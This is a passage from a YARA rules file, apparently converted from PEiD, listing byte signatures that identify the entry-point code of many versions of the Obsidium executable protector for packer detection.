?? 50 EB 03 ?? ?? ?? 33 C0 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1333_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1352_Obsidium_Software_SignByfly: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 03 ?? ?? ?? E8 }\r\n        $b = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1355_Obsidium_Software_20080411: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2B 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 ?? ?? ?? ?? EB 01 ?? E8 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 01 ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1352_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_10069_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 A3 1C 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1300_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1333_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B ?? 24 0C EB 01 ?? 83 ?? B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1338_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 57 27 00 00 }\r\n        $b = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1337_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1337_20070620_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1304_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? E8 3B 26 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V125_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1304_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 ?? 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_vxxxx_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 47 19 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1250_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V12_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 77 1E 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1258_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 ?? 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_vxxxx: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 5D 01 ?? ?? CE D1 CE CE 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 20 4F 52 69 45 }\r\n        $b = { E8 47 19 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v10061: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 47 }\r\n        $b = { E8 AF 1C 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_13013_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 26 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 03 ?? ?? ?? E8 13 26 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13013_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 26 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 03 ?? ?? ?? E8 13 26 00 00 }\r\n        $b = { EB 01 ?? E8 26 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 01 ?? 33 C0 EB 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1322_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1300_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 22 EB 02 ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 47 26 00 00 }\r\n        $b = { EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1200_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 3F 1E 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1300_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 83 A4 BC CE 60 EB 04 80 BC 04 11 E8 00 00 00 00 81 2C 24 CA C2 41 00 EB 04 64 6B 88 18 5D E8 00 00 00 00 EB 04 64 6B 88 18 81 2C 24 86 00 00 00 EB 04 64 6B 88 18 8B 85 9C C2 41 00 EB 04 64 6B 88 18 29 04 24 EB 04 64 6B 88 18 EB 04 64 6B 88 18 8B 04 24 EB 04 64 6B 88 18 89 85 9C C2 41 00 EB 04 64 6B 88 18 58 68 9F 6F 56 B6 50 E8 5D 00 00 00 EB FF 71 78 C2 50 00 EB D3 5B F3 68 89 5C 24 48 5C 24 58 FF 8D 5C 24 58 5B 83 C3 4C 75 F4 5A 8D 71 78 75 09 81 F3 EB FF 52 BA 01 00 83 EB FC 4A FF 71 0F 75 19 8B 5C 24 00 00 81 33 50 53 8B 1B 0F FF C6 75 1B 81 F3 EB 87 1C 24 8B 8B 04 24 83 EC FC EB 01 E8 83 EC FC E9 E7 00 00 00 58 EB FF F0 EB FF C0 83 E8 FD EB FF 30 E8 C9 00 00 00 89 E0 EB FF D0 EB FF 71 0F 83 C0 01 EB FF 70 F0 71 EE EB FA EB 83 C0 14 EB FF 70 ED }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1311_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 03 ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1341_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 C3 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1200_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 28 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 02 ?? ?? 58 EB 03 ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 4F 26 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v13037_Obsidium_Software_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 }\r\n        $b = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1400Beta_Obsidium_Software_SignByfly_20080102_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2F 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13037_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1400Beta_Obsidium_Software_SignByfly_20080102: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2F 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 01 ?? E9 ?? ?? ?? ?? EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 }\r\n        $b = { EB 01 ?? E8 2F 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_1334_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1400Beta_Obsidium_Software_20080102: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? E8 2F 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 01 ?? E9 ?? ?? ?? ?? EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_11114_11115_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 3F 1D 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V12_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 77 1E 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1337_20070623_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1336_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule 